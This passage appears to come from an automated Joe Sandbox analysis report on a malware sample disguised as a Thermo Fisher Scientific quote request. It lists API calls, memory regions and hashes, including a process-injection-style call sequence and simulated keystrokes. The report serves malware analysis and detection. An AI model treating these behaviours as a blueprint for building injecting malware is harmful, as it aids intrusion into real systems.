                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3902256705-0
                                                              • Opcode ID: a282f762cf73e6dc8ef2cecde536aec33549eb85f694025eca7e10a9fdc54287
                                                              • Instruction ID: 7e9027a27fe594bb5672f1a8c823c48aa5d8527cc682b043ba48a1e61508b062
                                                              • Opcode Fuzzy Hash: a282f762cf73e6dc8ef2cecde536aec33549eb85f694025eca7e10a9fdc54287
                                                              • Instruction Fuzzy Hash: 9CF0A43110422D67DB44BF98E8019DE7BEB9F01354F744129F909E2181DBB096819BB9
                                                              APIs
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              • __lock_file.LIBCMT ref: 00623629
                                                                • Part of subcall function 00624E1C: __lock.LIBCMT ref: 00624E3F
                                                              • __fclose_nolock.LIBCMT ref: 00623634
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                              • String ID:
                                                              • API String ID: 2800547568-0
                                                              • Opcode ID: 62dd2407153268818ddd9e76f9930e9992d90d375d55a131ebabdabe4a21a0e2
                                                              • Instruction ID: 2e7aa44ff4aa9c0c5cc0a3789f5a3239e50368a2367fe80d3e55c91ed3079a78
                                                              • Opcode Fuzzy Hash: 62dd2407153268818ddd9e76f9930e9992d90d375d55a131ebabdabe4a21a0e2
                                                              • Instruction Fuzzy Hash: B3F0B471901E34AADB517B75E8027AE7AA76F40330F26810CF465AB3C1CB7C8A019F59
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 00D4BA23
                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00D4BAB9
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00D4BADB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                              • String ID:
                                                              • API String ID: 2438371351-0
                                                              • Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                              • Instruction ID: b9f901658fa9bdc14601367c490d9e085b2c519b77ae5a321723d9c41460b5b7
                                                              • Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
                                                              • Instruction Fuzzy Hash: 1312BE24E14658C7EB24DF64D8507DEB232EF68300F10A0E9910DEB7A5E77A4E91CF5A
                                                              APIs
                                                              • __flush.LIBCMT ref: 00622A0B
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __flush__getptd_noexit
                                                              • String ID:
                                                              • API String ID: 4101623367-0
                                                              • Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction ID: 48f17268af6db69a26a09f41a3e5c13d50c35150f119259257fbf0e35d0e3f94
                                                              • Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
                                                              • Instruction Fuzzy Hash: F041B570B00F27BFDB288E6AE8A15EE77A7AF44360B24852DE855C7640DA70DD818F44
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction ID: f1b5292361f70d4f07231318639c7867302680a494c912af0192d187ac3f7889
                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                              • Instruction Fuzzy Hash: 1F31C974A00105DBD718DF58E4909E9FBB6FF49340B6886A5E809CB355DB32EDC2CB90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: 9f78cfebf7abf3cd460719f9870a33e4bd0541e256e72c67d032701b498b11c0
                                                              • Instruction ID: 23d85cab43fa39969b7e954e844ed370e961daa6f310e3cb3094e30b135f5149
                                                              • Opcode Fuzzy Hash: 9f78cfebf7abf3cd460719f9870a33e4bd0541e256e72c67d032701b498b11c0
                                                              • Instruction Fuzzy Hash: 27415D745086118FEB24DF14C444B5ABBF2BF85304F1989ACE99A4B762C372E886CF52
                                                              APIs
                                                                • Part of subcall function 00604214: FreeLibrary.KERNEL32(00000000,?), ref: 00604247
                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,006039FE,?,00000001), ref: 006041DB
                                                                • Part of subcall function 00604291: FreeLibrary.KERNEL32(00000000), ref: 006042C4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Library$Free$Load
                                                              • String ID:
                                                              • API String ID: 2391024519-0
                                                              • Opcode ID: fdd2daa54a66ea40070c4a1a43309cb95da05908e26971213f1410fec2f8cbcb
                                                              • Instruction ID: 1acf71a100f7b769c3d5b29fd223e437e3e49863cdc8243646cc7bbfdb52a227
                                                              • Opcode Fuzzy Hash: fdd2daa54a66ea40070c4a1a43309cb95da05908e26971213f1410fec2f8cbcb
                                                              • Instruction Fuzzy Hash: F211C471740206AACB68BB60DC16B9F77EB9F40700F10842DF696A61C1DF759B059B64
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: ClearVariant
                                                              • String ID:
                                                              • API String ID: 1473721057-0
                                                              • Opcode ID: e59e04878f80aacf7ca4789e3d89ad2ea71c4b69a0dc7b07540f3145f1b5c8b4
                                                              • Instruction ID: 475d22af3bf001bf277821c4c3f30a01ead52f08ccfff2c8405c0669ff031bbd
                                                              • Opcode Fuzzy Hash: e59e04878f80aacf7ca4789e3d89ad2ea71c4b69a0dc7b07540f3145f1b5c8b4
                                                              • Instruction Fuzzy Hash: C5212774508601CFEB64DF64C444A9ABBF2BF85304F18896CF59A4B762C771E886CF52
                                                              APIs
                                                              • ___lock_fhandle.LIBCMT ref: 0062AFC0
                                                                • Part of subcall function 00627BDA: __getptd_noexit.LIBCMT ref: 00627BDA
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                              • String ID:
                                                              • API String ID: 1144279405-0
                                                              • Opcode ID: ab062d48ce1e3462e3d845da9a961ff12393ee9e34c7253e575f19cd7980061f
                                                              • Instruction ID: de2853d0359e48b33a4c9ed263f0da33a1d550f45b3cc9251f6e62a4c4619309
                                                              • Opcode Fuzzy Hash: ab062d48ce1e3462e3d845da9a961ff12393ee9e34c7253e575f19cd7980061f
                                                              • Instruction Fuzzy Hash: 6F11B2B2804E309FD7526FA4F802BA93763AF41332F165248F4701B1E2C7B88D018FA9
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                              • Instruction ID: c6e1619b42a64cc8d95778236c06f6ac9e174cc1b80a3363612f655c86ecaf95
                                                              • Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
                                                              • Instruction Fuzzy Hash: 0801867154010AEECF49EF64C8918FFBB7AAF20304F00C069B515971D5EA309B49CF64
                                                              APIs
                                                              • __lock_file.LIBCMT ref: 00622AED
                                                                • Part of subcall function 00627C0E: __getptd_noexit.LIBCMT ref: 00627C0E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: __getptd_noexit__lock_file
                                                              • String ID:
                                                              • API String ID: 2597487223-0
                                                              • Opcode ID: 84eaf5f65689e379ee92505b439294ae9ff316f343aad015632b51af97772994
                                                              • Instruction ID: 5c0585638731c1eddd608708adcffdd233cdad0c3076042dbb463e3a78ca05d2
                                                              • Opcode Fuzzy Hash: 84eaf5f65689e379ee92505b439294ae9ff316f343aad015632b51af97772994
                                                              • Instruction Fuzzy Hash: FFF0C231900A26BADF61AF74EC027DF3AA3BF00311F154429B4149A191C7788A62DF45
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,006039FE,?,00000001), ref: 00604286
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 03e8bae9f89d52f9aa42c209f2dfe7446068c6b69bff208c61147b1e75302d1e
                                                              • Instruction ID: 95d18c554800d197f57c9efdc9cc5a9b05e1bfd8603445e5fefe3d2d41357ebd
                                                              • Opcode Fuzzy Hash: 03e8bae9f89d52f9aa42c209f2dfe7446068c6b69bff208c61147b1e75302d1e
                                                              • Instruction Fuzzy Hash: F0F039B1649712DFCB389F64E894857BBE6BF043253248A7EF2D682650CB729A40DF50
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006040C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath
                                                              • String ID:
                                                              • API String ID: 82841172-0
                                                              • Opcode ID: c45f8a8699d69bbeab6760c9e094fd69665ad9e76061b7c3f63e05574fbe4de2
                                                              • Instruction ID: 8c19c5c257186f8e78ced0047f82e4fa32fa0197d02ae065d0c5f52754f2d8ca
                                                              • Opcode Fuzzy Hash: c45f8a8699d69bbeab6760c9e094fd69665ad9e76061b7c3f63e05574fbe4de2
                                                              • Instruction Fuzzy Hash: D3E0CD366001245BC711A758DC46FEB77AEDF8C6A0F050175F905D7284D97499818794
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction ID: a791e28182db9327d24894f9267134859f4d6bc18dacbd398be102cea7487031
                                                              • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                              • Instruction Fuzzy Hash: 23E0BF7494120DEFDB00DFE8D5496DD7BB4EF04301F1005A1FD05D7680DB709E548A66
                                                              APIs
                                                              • Sleep.KERNELBASE(000001F4), ref: 00D4C279
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063598102.0000000000D49000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D49000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_d49000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction ID: fc9d8a1fc7608ea8e61b179cb24b3fc4c5d90fa9892981872591f26c276d5c80
                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                              • Instruction Fuzzy Hash: 3EE0E67494120DDFDB00DFF8D54969D7BF4EF04301F100161FD05D2280D6709D508A72
                                                              APIs
                                                                • Part of subcall function 0061B34E: GetWindowLongW.USER32(?,000000EB), ref: 0061B35F
                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0066F87D
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066F8DC
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0066F919
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066F940
                                                              • SendMessageW.USER32 ref: 0066F966
                                                              • _wcsncpy.LIBCMT ref: 0066F9D2
                                                              • GetKeyState.USER32(00000011), ref: 0066F9F3
                                                              • GetKeyState.USER32(00000009), ref: 0066FA00
                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0066FA16
                                                              • GetKeyState.USER32(00000010), ref: 0066FA20
                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0066FA4F
                                                              • SendMessageW.USER32 ref: 0066FA72
                                                              • SendMessageW.USER32(?,00001030,?,0066E059), ref: 0066FB6F
                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0066FB85
                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0066FB96
                                                              • SetCapture.USER32(?), ref: 0066FB9F
                                                              • ClientToScreen.USER32(?,?), ref: 0066FC03
                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0066FC0F
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0066FC29
                                                              • ReleaseCapture.USER32 ref: 0066FC34
                                                              • GetCursorPos.USER32(?), ref: 0066FC69
                                                              • ScreenToClient.USER32(?,?), ref: 0066FC76
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066FCD8
                                                              • SendMessageW.USER32 ref: 0066FD02
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066FD41
                                                              • SendMessageW.USER32 ref: 0066FD6C
                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0066FD84
                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0066FD8F
                                                              • GetCursorPos.USER32(?), ref: 0066FDB0
                                                              • ScreenToClient.USER32(?,?), ref: 0066FDBD
                                                              • GetParent.USER32(?), ref: 0066FDD9
                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0066FE3F
                                                              • SendMessageW.USER32 ref: 0066FE6F
                                                              • ClientToScreen.USER32(?,?), ref: 0066FEC5
                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0066FEF1
                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0066FF19
                                                              • SendMessageW.USER32 ref: 0066FF3C
                                                              • ClientToScreen.USER32(?,?), ref: 0066FF86
                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0066FFB6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0067004B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                              • String ID: @GUI_DRAGID$F
                                                              • API String ID: 2516578528-4164748364
                                                              • Opcode ID: 329ebbc093bfc32d127f2a787386140d63b517b004e274c8505be853414911b9
                                                              • Instruction ID: 28f7e383327d31b427684d07f69e74f3a554d763dd9cdc1ebcddfd6624a76791
                                                              • Opcode Fuzzy Hash: 329ebbc093bfc32d127f2a787386140d63b517b004e274c8505be853414911b9
                                                              • Instruction Fuzzy Hash: 7532B970604244EFDB20CF68D884EAABBB6FF4A354F140A6DF695872A1D731EC51CB61
                                                              APIs
                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0066B1CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2063197417.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                              • Associated: 00000000.00000002.2063180078.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.000000000068D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063243986.00000000006AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063285271.00000000006BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2063304464.00000000006C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_600000_Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID: %d/%02d/%02d
                                                              • API String ID: 3850602802-328681919
                                                              • Opcode ID: e281f537a1636f2e9dde210edce9a13e585ca708e6c6fa47bc2417cb8ed6938b
                                                              • Instruction ID: e02eb6c2109ef79557d07ee7aee346a7ccc7528589d9b2493cc47699a7881e42
                                                              • Opcode Fuzzy Hash: e281f537a1636f2e9dde210edce9a13e585ca708e6c6fa47bc2417cb8ed6938b
                                                              • Instruction Fuzzy Hash: 3112CE71500208BBEB249F65DC49FAABBBAFF45310F144219F915EB2D1DB749982CF21
                                                              APIs
                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 0061EB4A
                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00673AEA
                                                              • IsIconic.USER32(000000FF), ref: 00673AF3
                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00673B00
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673B0A
                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00673B20
                                                              • GetCurrentThreadId.KERNEL32 ref: 00673B27
                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00673B33
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00673B44
                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00673B4C
                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00673B54
                                                              • SetForegroundWindow.USER32(000000FF), ref: 00673B57
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B6C
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B77
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B81
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B86
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B8F
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673B94
                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00673B9E
                                                              • keybd_event.USER32(00000012,00000000), ref: 00673BA3
